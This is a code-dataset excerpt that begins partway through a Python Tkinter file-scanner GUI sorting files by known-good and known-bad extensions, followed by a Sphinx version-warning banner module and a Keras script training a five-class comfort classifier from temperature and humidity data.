percent=self.scanned_files/self.number_of_files\r\n self.scan_gui.update_current_information(self.scanned_files,self.number_of_files,self.current_directory)\r\n self.scan_gui.update_progress_bar(percent,part,2)\r\n self.scan_gui.update_file_lists(self.file_type_object_list)\r\n\r\n\r\nclass FileType(object):\r\n def __init__(self,file_extension,file_consensus):\r\n self.file_extension=file_extension\r\n self.file_consensus=file_consensus\r\n self.file_type_locations=[]\r\n\r\n def get_file_extension(self):\r\n return self.file_extension\r\n def get_file_consensus(self):\r\n return self.file_consensus\r\n def get_number_of_files(self):\r\n return len(self.file_type_locations)\r\n def get_file_type_locations(self):\r\n return self.file_type_locations\r\n \r\n def add_file_to_list(self,file_path):\r\n self.file_type_locations.append(\"{0}{1}\".format(file_path,self.file_extension))\r\n\r\n def print_information(self):\r\n print(\"File extension: {0}\".format(self.file_extension))\r\n for item in self.file_type_locations:\r\n print(\" -> {0}\".format(item),end=\"\")\r\n print(\"\\t{0:7s} Consensus: {1}\".format(\"\",self.file_consensus))\r\n \r\n\r\nclass FileTypeEditor(object):\r\n def __init__(self,parent_window,edit_type):\r\n self.edit_type=edit_type\r\n self.set_file_type_list()\r\n self.window=TkinterWrapper.DialogBox(parent_window,\"Edit {0} File Types\".format(edit_type))\r\n self.__setup_window()\r\n self.__setup_frames()\r\n self.__setup_left_frame()\r\n self.__setup_right_frame()\r\n self.__setup_bottom_frame()\r\n self.update_listbox_text()\r\n\r\n def set_file_type_list(self):\r\n if self.edit_type==\"KnownGood\":\r\n self.file_type_list=saved_information.get_known_good_filetypes()\r\n elif self.edit_type==\"KnownBad\":\r\n self.file_type_list=saved_information.get_known_bad_filetypes()\r\n self.delete_list=[]\r\n self.append_list=[]\r\n \r\n def __setup_window(self):\r\n self.window.remove_min_max_buttons(True)\r\n self.window.resizable(False,False)\r\n self.window.bind_action(\"<Return>\",self.add_file_type)\r\n\r\n def __setup_frames(self):\r\n self.top_frame=TkinterWrapper.WindowFrame(self.window.get_window())\r\n self.bottom_frame=TkinterWrapper.WindowFrame(self.window.get_window())\r\n self.left_frame=TkinterWrapper.WindowFrame(self.top_frame.get_frame())\r\n self.right_frame=TkinterWrapper.WindowFrame(self.top_frame.get_frame())\r\n for item in [[self.top_frame,\"top\"],[self.left_frame,\"left\"],[self.right_frame,\"right\"],\r\n [self.bottom_frame,\"bottom\"]]:\r\n item[0].pack_frame(item[1],1,0)\r\n self.left_frame.configure_border(\"ridge\",2)\r\n\r\n def __setup_right_frame(self):\r\n self.file_type_listbox=TkinterWrapper.WindowListbox(self.right_frame.get_frame())\r\n self.file_type_listbox.configure_size(20,10)\r\n self.file_type_listbox.pack_listbox(\"left\",0,0)\r\n y_scrollbar=TkinterWrapper.WindowScrollbar(self.right_frame.get_frame(),\"y\")\r\n y_scrollbar.attach_to_widget(self.file_type_listbox.get_listbox())\r\n self.file_type_listbox.attach_scrollbar(\"y\",y_scrollbar.get_scrollbar())\r\n y_scrollbar.pack_scrollbar(\"left\",0,0)\r\n\r\n def __setup_left_frame(self):\r\n self.insert_explanatory_label(self.left_frame.get_frame(),\"Enter File Extension to Add:\")\r\n self.__setup_entry_frame()\r\n self.insert_explanatory_label(self.left_frame.get_frame(),\"Select a File Extension to Delete\")\r\n self.insert_button(self.left_frame.get_frame(),\"Delete\",self.delete_file_type,\"top\")\r\n self.error_frame=TkinterWrapper.WindowFrame(self.left_frame.get_frame())\r\n 
self.error_frame.pack_frame(\"top\",0,0)\r\n \r\n def __setup_entry_frame(self):\r\n entry_frame=TkinterWrapper.WindowFrame(self.left_frame.get_frame())\r\n entry_frame.pack_frame(\"top\",0,0)\r\n self.file_type_entry=TkinterWrapper.WindowEntry(entry_frame.get_frame())\r\n self.file_type_entry.configure_size(20)\r\n self.file_type_entry.pack_entry(\"left\",0,2)\r\n self.insert_button(entry_frame.get_frame(),\"Add\",self.add_file_type,\"left\")\r\n\r\n def __setup_bottom_frame(self):\r\n self.insert_button(self.bottom_frame.get_frame(),\"Cancel\",partial(self.window.destroy_window,False),\"left\")\r\n self.insert_button(self.bottom_frame.get_frame(),\"Save\",self.save_all_file_types_and_exit,\"left\")\r\n\r\n def insert_explanatory_label(self,frame,text):\r\n label=TkinterWrapper.WindowLabel(frame,text)\r\n label.configure_colors(\"dodgerblue2\",\"grey95\",\"times 11\")\r\n label.pack_label(\"top\",0,10)\r\n\r\n def insert_button(self,frame,button_text,button_action,side):\r\n button=TkinterWrapper.WindowButton(frame,button_text,button_action)\r\n button.pack_button(side,2,2)\r\n\r\n def add_file_type(self,*args):\r\n new_file_type=self.file_type_entry.get_entry()\r\n if len(new_file_type)>0 and new_file_type[0]==\".\" and (new_file_type not in self.file_type_list):\r\n self.file_type_list.append(new_file_type)\r\n self.append_list.append(new_file_type)\r\n self.update_listbox_text()\r\n self.file_type_entry.configure_entry_text(\"\")\r\n else:\r\n user_error=UserErrorMessage.UserErrorMessage(self.error_frame.get_frame(),\"Please enter a valid file type\")\r\n self.file_type_entry.select_range(0,\"end\")\r\n \r\n def delete_file_type(self):\r\n selection=self.file_type_listbox.get_current_selection()\r\n selection=self.file_type_listbox.get_text_from_index(selection)\r\n if selection!=None:\r\n for x in range(0,len(self.file_type_list)):\r\n if self.file_type_list[x]==selection:\r\n self.delete_list.append(self.file_type_list[x])\r\n del(self.file_type_list[x])\r\n break\r\n self.update_listbox_text()\r\n else:\r\n user_error=UserErrorMessage.UserErrorMessage(self.error_frame.get_frame(),\"Please select a file to delete\")\r\n \r\n def update_listbox_text(self):\r\n self.file_type_listbox.delete_text(0,\"end\")\r\n for item in self.file_type_list:\r\n self.file_type_listbox.insert_text(\"{0}\\n\".format(item),\"end\")\r\n\r\n def save_all_file_types_and_exit(self):\r\n for item in self.delete_list:\r\n saved_information.delete_file_type(self.edit_type,item)\r\n for item in self.append_list:\r\n saved_information.add_file_type(self.edit_type,item)\r\n self.window.destroy_window(False)\r\n\r\n \r\nclass SetDirWindow(object):\r\n def __init__(self,parent_window):\r\n self.window=TkinterWrapper.DialogBox(parent_window,\"Choose Folder\")\r\n self.directory_to_search=\"\"\r\n self.__setup_window()\r\n self.__setup_frames()\r\n self.__setup_information_frame()\r\n self.__setup_directory_frame()\r\n self.__setup_button_frame()\r\n self.window.start_mainloop()\r\n\r\n def __setup_window(self):\r\n self.window.remove_min_max_buttons(True)\r\n self.window.resizable(False,False)\r\n\r\n def __setup_frames(self):\r\n self.information_frame=TkinterWrapper.WindowFrame(self.window.get_window())\r\n self.directory_frame=TkinterWrapper.WindowFrame(self.window.get_window())\r\n self.button_frame=TkinterWrapper.WindowFrame(self.window.get_window())\r\n self.information_frame.pack_frame(\"top\",0,0)\r\n self.directory_frame.pack_frame(\"top\",0,0)\r\n self.button_frame.pack_frame(\"top\",0,0)\r\n\r\n def 
__setup_information_frame(self):\r\n description_label=TkinterWrapper.WindowLabel(self.information_frame.get_frame(),\"\")\r\n description_label.configure_text(\"Please choose a folder to search from the list below:\")\r\n description_label.configure_colors(\"grey20\",\"grey95\",\"times 11\")\r\n description_label.pack_label(\"top\",0,5)\r\n\r\n def __setup_directory_frame(self):\r\n self.__setup_directory_entry_frame()\r\n self.__setup_directory_listbox_frame()\r\n\r\n def __setup_directory_entry_frame(self):\r\n directory_entry_frame=TkinterWrapper.WindowFrame(self.directory_frame.get_frame())\r\n directory_entry_frame.pack_frame(\"top\",0,0)\r\n current_directory_label=TkinterWrapper.WindowLabel(directory_entry_frame.get_frame(),\"Current Directory:\\n\")\r\n current_directory_label.pack_label(\"left\",0,0)\r\n current_directory_label.configure_colors(\"dodgerblue2\",\"grey95\",\"times 10\")\r\n self.current_directory_entry=TkinterWrapper.WindowEntry(directory_entry_frame.get_frame())\r\n self.current_directory_entry.configure_size(65)\r\n self.current_directory_entry.pack_entry(\"top\",0,0)\r\n x_scrollbar=TkinterWrapper.WindowScrollbar(directory_entry_frame.get_frame(),\"x\")\r\n x_scrollbar.attach_to_widget(self.current_directory_entry.get_entry_widget())\r\n self.current_directory_entry.attach_scrollbar(x_scrollbar.get_scrollbar())\r\n x_scrollbar.pack_scrollbar(\"bottom\",0,0)\r\n\r\n def __setup_directory_listbox_frame(self):\r\n directory_listbox_frame=TkinterWrapper.WindowFrame(self.directory_frame.get_frame())\r\n directory_listbox_frame.pack_frame(\"top\",0,0)\r\n self.dir_listbox=DirectoryListbox(directory_listbox_frame.get_frame(),self.current_directory_entry)\r\n\r\n def __setup_button_frame(self):\r\n self.search_button=TkinterWrapper.WindowButton(self.button_frame.get_frame(),\"Scan\",self.set_directory_and_destroy_window)\r\n self.search_button.pack_button(\"top\",0,0)\r\n\r\n def set_directory_and_destroy_window(self):\r\n self.directory_to_search=self.current_directory_entry.get_entry()\r\n print(\"Directory to scan: \"+self.directory_to_search)\r\n self.window.destroy_window(True)\r\n def get_saved_directory(self):\r\n return self.directory_to_search\r\n \r\n\r\n#Might have to split up into two classes: DirectoryListboxFormatting and DirectoryListboxActions\r\nclass DirectoryListbox(TkinterWrapper.WindowListbox):\r\n def __init__(self,frame,companion_text_entry):\r\n self.frame=frame\r\n self.selections=[\"\",\"\"]\r\n self.current_directory_entry=companion_text_entry\r\n self.computer_directory=ComputerDirectory()\r\n self.__setup_listbox_frame()\r\n self.__setup_error_frame()\r\n self.insert_harddrives()\r\n self.start_checking_for_selection()\r\n\r\n def __setup_listbox_frame(self):\r\n self.listbox_frame=TkinterWrapper.WindowFrame(self.frame)\r\n self.listbox_frame.pack_frame(\"top\",0,0)\r\n super(DirectoryListbox, self).__init__(self.listbox_frame.get_frame())\r\n super(DirectoryListbox, self).pack_listbox(\"left\",0,0)\r\n super(DirectoryListbox, self).configure_size(80,10)\r\n self.__setup_scrollbar()\r\n def __setup_scrollbar(self):\r\n y_scrollbar=TkinterWrapper.WindowScrollbar(self.listbox_frame.get_frame(),\"y\")\r\n y_scrollbar.attach_to_widget(super(DirectoryListbox, self).get_listbox())\r\n super(DirectoryListbox, self).attach_scrollbar(\"y\",y_scrollbar.get_scrollbar())\r\n y_scrollbar.pack_scrollbar(\"left\",0,0)\r\n\r\n def __setup_error_frame(self):\r\n self.error_frame=TkinterWrapper.WindowFrame(self.frame)\r\n 
self.error_frame.pack_frame(\"top\",0,0)\r\n\r\n def insert_harddrives(self):\r\n super(DirectoryListbox, self).delete_text(0,\"end\")\r\n for harddrive in self.computer_directory.get_harddrives():\r\n print(harddrive)\r\n super(DirectoryListbox, self).insert_text(\"{0} {1}\\n\".format(RIGHT_TRIANGLE,harddrive),\"end\")\r\n\r\n def start_checking_for_selection(self):\r\n self.selections[0]=super(DirectoryListbox, self).get_current_selection()\r\n self.selections[0]=super(DirectoryListbox, self).get_text_from_index(self.selections[0])\r\n if self.selections[0]!=self.selections[1] and self.selections[0]!=None:\r\n print(\"Selection changed to: {0}\".format(self.selections[0]))\r\n self.selection_actions()\r\n self.selections[1]=self.selections[0]\r\n self.frame.after(250,self.start_checking_for_selection)\r\n\r\n def selection_actions(self):\r\n if RIGHT_TRIANGLE in self.selections[0]:\r\n self.go_to_subdirectory()\r\n elif LEFT_TRIANGLE in self.selections[0]:\r\n self.go_up_directory()\r\n\r\n def go_to_subdirectory(self):\r\n self.computer_directory.set_current_directory(self.get_rid_of_arrows_in_directory(self.selections[0]))\r\n subdirectories=self.computer_directory.get_sub_directories()\r\n if subdirectories!=\"ACCESS DENIED\":\r\n self.update_directory_entry()\r\n self.add_directional_information()\r\n for subdirectory in subdirectories:\r\n super(DirectoryListbox, self).insert_text(\" {0} {1}\\n\".format(RIGHT_TRIANGLE,subdirectory),\"end\")\r\n else:\r\n error_message=UserErrorMessage.UserErrorMessage(self.error_frame.get_frame(),\"Access to folder was denied.\")\r\n self.go_up_directory()\r\n print(\"Access to folder denied\")\r\n\r\n def add_directional_information(self):\r\n super(DirectoryListbox, self).delete_text(0,\"end\")\r\n super(DirectoryListbox, self).insert_text(\"{0} Back to {1}\\n\".format(LEFT_TRIANGLE,self.computer_directory.get_previous_directory()),\"end\")\r\n super(DirectoryListbox, self).insert_text(\"{0} {1}\\n\".format(DOWN_TRIANGLE,self.computer_directory.get_current_directory()),\"end\")\r\n\r\n def get_rid_of_arrows_in_directory(self,directory):\r\n for x in range(0,len(directory)):\r\n if (directory[x]!=RIGHT_TRIANGLE and directory[x]!=DOWN_TRIANGLE and directory[x]!=LEFT_TRIANGLE)\\\r\n and (directory[x]!=\" \"):\r\n directory=directory[x:len(directory):1]\r\n break\r\n return directory\r\n\r\n def go_up_directory(self):\r\n self.computer_directory.trim_from_current_directory(1)\r\n self.update_directory_entry()\r\n new_directories=self.computer_directory.get_sub_directories()\r\n if new_directories!=self.computer_directory.get_harddrives():\r\n self.add_directional_information()\r\n else:\r\n super(DirectoryListbox, self).delete_text(0,\"end\")\r\n for new_directory in new_directories:\r\n super(DirectoryListbox, self).insert_text(\" {0} {1}\\n\".format(RIGHT_TRIANGLE,new_directory),\"end\")\r\n\r\n def update_directory_entry(self):\r\n self.current_directory_entry.configure_entry_text(self.computer_directory.get_formatted_current_directory())\r\n \r\n \r\nclass ComputerDirectory(object):\r\n def __init__(self):\r\n self.harddrives=[]\r\n self.current_directory=[]\r\n self.formatted_current_directory=\"\"\r\n self.find_harddrives()\r\n\r\n def find_harddrives(self):\r\n self.harddrives=[\"{0}:\".format(drive) for drive in ALPHABET if os.path.exists(\"{0}:\\\\\".format(drive))]\r\n def get_harddrives(self):\r\n return self.harddrives\r\n\r\n def set_current_directory(self, directory):\r\n 
self.current_directory.append(\"{0}\\\\\".format(directory))\r\n self.set_formatted_current_directory()\r\n print(\"Current Dir: \",self.current_directory)\r\n\r\n def get_current_directory(self):\r\n return self.current_directory[len(self.current_directory)-1]\r\n def get_previous_directory(self):\r\n if len(self.current_directory)==1:\r\n return \"Hard drives\"\r\n else:\r\n return self.current_directory[(len(self.current_directory)-1)-1]\r\n\r\n def trim_from_current_directory(self,number_of_levels):\r\n self.delete_last_directories(number_of_levels)\r\n self.set_formatted_current_directory()\r\n print(\"Current Dir: \",self.current_directory)\r\n\r\n def delete_last_directories(self,number_of_levels):\r\n for x in range(0,len(self.current_directory)):\r\n if len(self.current_directory)-x<=number_of_levels:\r\n del(self.current_directory[x])\r\n break\r\n print(self.current_directory)\r\n\r\n def get_sub_directories(self):\r\n if len(self.current_directory)==0:\r\n return self.harddrives\r\n else:\r\n try:\r\n os.listdir(self.formatted_current_directory)\r\n except OSError:\r\n print(\"Error opening directory\")\r\n return \"ACCESS DENIED\"\r\n else:\r\n sub_directories=[sub_dir for sub_dir in os.listdir(self.formatted_current_directory) if os.path.isdir(os.path.join(self.formatted_current_directory, sub_dir))]\r\n print(sub_directories)\r\n return sub_directories\r\n \r\n def set_formatted_current_directory(self):\r\n self.formatted_current_directory=\"\"\r\n for x in range(0,len(self.current_directory)):\r\n self.formatted_current_directory=\"{0}{1}\".format(self.formatted_current_directory,self.current_directory[x])\r\n print(\"Formatted Cur Dir: \"+self.formatted_current_directory)\r\n def get_formatted_current_directory(self):\r\n return self.formatted_current_directory\r\n\r\n\r\nclass SavedInfo(object):\r\n def __init__(self):\r\n self.known_good_file=FileWrapper.File(os.curdir,\"KnownGoodFiletypes.txt\")\r\n self.known_bad_file=FileWrapper.File(os.curdir,\"KnownBadFiletypes.txt\")\r\n self.__setup_filetypes()\r\n self.directory_to_scan=\"\"\r\n\r\n def __setup_filetypes(self):\r\n self.known_good_filetypes=self.known_good_file.read_lines(0,'end')\r\n self.known_bad_filetypes=self.known_bad_file.read_lines(0,'end')\r\n\r\n def get_known_good_filetypes(self):\r\n good_file_types=self.known_good_filetypes\r\n return good_file_types[0:len(good_file_types)]\r\n def get_known_bad_filetypes(self):\r\n bad_file_types=self.known_bad_filetypes\r\n return bad_file_types[0:len(bad_file_types)]\r\n\r\n def add_file_type(self,file_consensus,file_type):\r\n if file_consensus==\"KnownGood\":\r\n self.known_good_filetypes.append(file_type)\r\n elif file_consensus==\"KnownBad\":\r\n self.known_bad_filetypes.append(file_type)\r\n def delete_file_type(self,file_consensus,file_type):\r\n if file_consensus==\"KnownGood\":\r\n file_list=self.known_good_filetypes\r\n elif file_consensus==\"KnownBad\":\r\n file_list=self.known_bad_filetypes\r\n for x in range(0,len(file_list)):\r\n if file_list[x]==file_type:\r\n del(file_list[x])\r\n break\r\n \r\n def set_directory_to_scan(self,new_directory):\r\n self.directory_to_scan=new_directory\r\n def get_directory_to_scan(self):\r\n return self.directory_to_scan\r\n\r\n def save_info_to_file(self):\r\n self.known_good_file.delete_all_file_contents()\r\n self.known_bad_file.delete_all_file_contents()\r\n for item in self.known_good_filetypes:\r\n self.known_good_file.append_line_to_file(item)\r\n for item in self.known_bad_filetypes:\r\n 
self.known_bad_file.append_line_to_file(item)\r\n\r\n def close_all_files(self):\r\n self.known_good_file.close_file()\r\n self.known_bad_file.close_file()\r\n\r\n\r\n\r\ndef main():\r\n application_window=AppWindow()\r\n print(\"here\")\r\n saved_information.save_info_to_file()\r\n saved_information.close_all_files()\r\nsaved_information=SavedInfo()\r\nmain()\r\n", "sub_path": "FileScanner.pyw", "file_name": "FileScanner.pyw", "file_ext": "pyw", "file_size_in_byte": 42493, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "TkinterWrapper.Window", "line_number": 40, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowMenu", "line_number": 53, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowMenuCascade", "line_number": 54, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowMenuCascade", "line_number": 56, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 57, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 58, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 63, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 64, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 65, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 89, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowButton", "line_number": 94, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 98, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 101, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 138, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 139, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 140, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 162, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 167, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 174, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowListbox", "line_number": 176, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowScrollbar", "line_number": 179, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 186, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowScrollbar", "line_number": 188, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 205, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 209, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 210, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 215, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 217, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowEntry", "line_number": 219, "usage_type": "call"}, {"api_name": "os.startfile", "line_number": 340, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowCanvas", "line_number": 343, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 403, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 412, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 418, "usage_type": "call"}, {"api_name": "os.path", "line_number": 418, "usage_type": "attribute"}, {"api_name": 
"TkinterWrapper.DialogBox", "line_number": 485, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 507, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 508, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 509, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 510, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowListbox", "line_number": 517, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowScrollbar", "line_number": 520, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 530, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 534, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowEntry", "line_number": 536, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 542, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 546, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowButton", "line_number": 551, "usage_type": "call"}, {"api_name": "UserErrorMessage.UserErrorMessage", "line_number": 562, "usage_type": "call"}, {"api_name": "UserErrorMessage.UserErrorMessage", "line_number": 576, "usage_type": "call"}, {"api_name": "TkinterWrapper.DialogBox", "line_number": 593, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 607, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 608, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 609, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 615, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 625, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 627, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowEntry", "line_number": 630, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowScrollbar", "line_number": 633, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 639, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowButton", "line_number": 644, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowListbox", "line_number": 656, "usage_type": "attribute"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 668, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowScrollbar", "line_number": 675, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 681, "usage_type": "call"}, {"api_name": "UserErrorMessage.UserErrorMessage", "line_number": 714, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 754, "usage_type": "call"}, {"api_name": "os.path", "line_number": 754, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 788, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 793, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 793, "usage_type": "call"}, {"api_name": "os.path", "line_number": 793, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 793, "usage_type": "call"}, {"api_name": "FileWrapper.File", "line_number": 808, "usage_type": "call"}, {"api_name": "os.curdir", "line_number": 808, "usage_type": "attribute"}, {"api_name": "FileWrapper.File", "line_number": 809, "usage_type": "call"}, {"api_name": "os.curdir", "line_number": 809, "usage_type": "attribute"}]}
+{"seq_id": "151057337", "text": "# -*- coding: utf-8 -*-\n\nfrom docutils import nodes, core\nfrom munch import Munch\nimport os\n\nfrom .readthedocs import ReadTheDocsAPI\n\nUSE_READTHEDOCS_API = os.environ.get('USE_READTHEDOCS_API', False)\n\n\nclass VersionWarningBanner(object):\n\n ADMONITION_TYPES = {\n 'warning': nodes.warning,\n 'note': nodes.note,\n 'admonition': nodes.admonition,\n }\n\n def __init__(self, app, doctree):\n self.app = app\n self.doctree = doctree\n self.api = self._get_api()\n\n def get_banner_node(self):\n current_version_slug = self._current_doc_version_slug\n newest_version = self._latest_doc_version\n message = self._get_message(current_version_slug)\n banner = self._create_banner_node(message, newest_version)\n return banner\n\n def _get_api(self):\n if USE_READTHEDOCS_API:\n return ReadTheDocsAPI(self._project_slug)\n\n def _create_banner_node(self, message, newest_version, admonition_type='warning'):\n \"\"\"\n Return an admonition node to be inserted in the document.\n\n :rtype: docutils.nodes.admonition\n \"\"\"\n\n if (\n (\n (USE_READTHEDOCS_API and self.api.is_highest_version(self._current_doc_version_slug)) or\n newest_version.slug == self._current_doc_version_slug\n ) and self._current_doc_version_slug not in self.app.config.versionwarning_messages\n ):\n return None\n\n node_class = self.ADMONITION_TYPES.get(\n admonition_type,\n self.ADMONITION_TYPES.get(self._default_admonition_type),\n )\n\n if self._message_placeholder in message:\n message = message.replace(self._message_placeholder, '`{text} `_'.format(\n text=newest_version.slug,\n url=newest_version.url,\n ))\n paragraph = core.publish_doctree(message)[0]\n\n banner_node = node_class(ids=[self._banner_id_div])\n banner_node.append(paragraph)\n return banner_node\n\n @property\n def _banner_id_div(self):\n return self.app.config.versionwarning_banner_id_div\n\n @property\n def _project_slug(self):\n return self.app.config.versionwarning_project_slug\n\n @property\n def _message_placeholder(self):\n return self.app.config.versionwarning_message_placeholder\n\n @property\n def _default_admonition_type(self):\n return self.app.config.versionwarning_default_admonition_type\n\n @property\n def _current_doc_version_slug(self):\n return (\n os.environ.get('READTHEDOCS_VERSION', None) or\n self.app.config.versionwarning_project_version or\n self.app.config.version\n )\n\n @property\n def _latest_doc_version(self):\n if USE_READTHEDOCS_API:\n return self.api.newest_version()\n else:\n return Munch(\n url='.',\n slug=self._current_doc_version_slug,\n )\n\n def _get_message(self, version):\n return self.app.config.versionwarning_messages.get(\n version,\n self.app.config.versionwarning_default_message,\n )\n", "sub_path": "versionwarning/banner.py", "file_name": "banner.py", "file_ext": "py", "file_size_in_byte": 3171, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.environ.get", "line_number": 9, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 9, "usage_type": "attribute"}, {"api_name": "docutils.nodes.warning", "line_number": 15, "usage_type": "attribute"}, {"api_name": "docutils.nodes", "line_number": 15, "usage_type": "name"}, {"api_name": "docutils.nodes.note", "line_number": 16, "usage_type": "attribute"}, {"api_name": "docutils.nodes", "line_number": 16, "usage_type": "name"}, {"api_name": "docutils.nodes.admonition", "line_number": 17, "usage_type": "attribute"}, {"api_name": "docutils.nodes", 
"line_number": 17, "usage_type": "name"}, {"api_name": "readthedocs.ReadTheDocsAPI", "line_number": 34, "usage_type": "call"}, {"api_name": "docutils.core.publish_doctree", "line_number": 61, "usage_type": "call"}, {"api_name": "docutils.core", "line_number": 61, "usage_type": "name"}, {"api_name": "os.environ.get", "line_number": 86, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 86, "usage_type": "attribute"}, {"api_name": "munch.Munch", "line_number": 96, "usage_type": "call"}]}
+{"seq_id": "464543904", "text": "# -*- coding: utf-8 -*-\nfrom re import split\nimport numpy as np\nfrom numpy.lib import index_tricks\nfrom numpy.lib.financial import rate\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras.models import Sequential, model_from_json\nfrom tensorflow.keras.layers import Dense, Dropout\nfrom tensorflow.keras.optimizers import RMSprop\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.keras.utils import to_categorical\nimport matplotlib.pyplot as plt\nimport os\nimport pandas as pd\nimport pickle\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.python.keras.backend import binary_crossentropy\nfrom tensorflow.python.keras.callbacks import History\nfrom tensorflow.python.keras.engine import input_layer\nfrom tensorflow.python.keras.layers.core import Flatten\nfrom sklearn import preprocessing\nos.chdir('Mycode/sotuken')\n\ndef data_shuffle(all): \n train,test = train_test_split(all,test_size=0.3)\n return train,test\n\nall = pd.read_csv(\"seikika2.csv\")\ntrain,test= data_shuffle(all)\n\nprint(train)\n'''\ndef highscore_tr():\n train = pd.read_csv(\"train90_1.csv\")\n return train\ntrain = highscore_tr()\n'''\ntrainexp = train[[\"mode\",\"realTemp\",\"realHumi\",\"setVol\"]].values\ntrainpur = train[[\"very comfortable(0)\",\"little comfortable(1)\",\"neither(2)\",\"little discomfort(3)\",\"veriy discomfort(4)\"]].values\nprint(trainexp)\n'trainexpを正規化'\n#trainexp = print(preprocessing.minmax_scale(trainexp,axis=1))\n#trainexp.to_csv(\"seikika.csv\")\n\n\n'モデル構築'\nmodel = Sequential([\nDense(50,activation=\"relu\",input_shape=(4,)),\nDense(20,activation='relu'),\nDense(5,activation=\"softmax\")\n])\nmodel.summary() #モデルの詳細\nadam = optimizers.Adam(lr=0.003)\nmodel.compile(optimizer=adam,\n loss='categorical_crossentropy',\n metrics=['accuracy'],\n )\n'学習実行'\nhistory = model.fit(trainexp,\n trainpur,\n batch_size=100,\n epochs=100\n )\n\n'予測'\ntest_exp = test[[\"mode\",\"realTemp\",\"realHumi\",\"setVol\"]].values\ntestpur = test[[\"very comfortable(0)\",\"little comfortable(1)\",\"neither(2)\",\"little discomfort(3)\",\"veriy discomfort(4)\"]].values\n\npre = model.predict(test_exp)\n#preclass = model.predict_classes(test_exp)\nprint(pre)\nprint(testpur)\n\n\nprint(history.history.keys()) #historyに格納されているキーの確認\n\n'学習曲線'\ndef learn_ploting(): \n plt.title(\"loss and accuracy\")\n plt.scatter(x=0,y=0,label=\"loss\")\n plt.scatter(x=0,y=0,label=\"accuracy\")\n plt.legend()\n plt.xlabel(\"epochs\")\n plt.ylabel(\"accuracy\")\n plt.ylabel(\"loss\")\n plt.plot(history.history[\"loss\"])\n plt.plot(history.history[\"accuracy\"])\n plt.show()\n\nlearn_ploting()\n\n", "sub_path": "Mycode/sotuken/sotuken03.py", 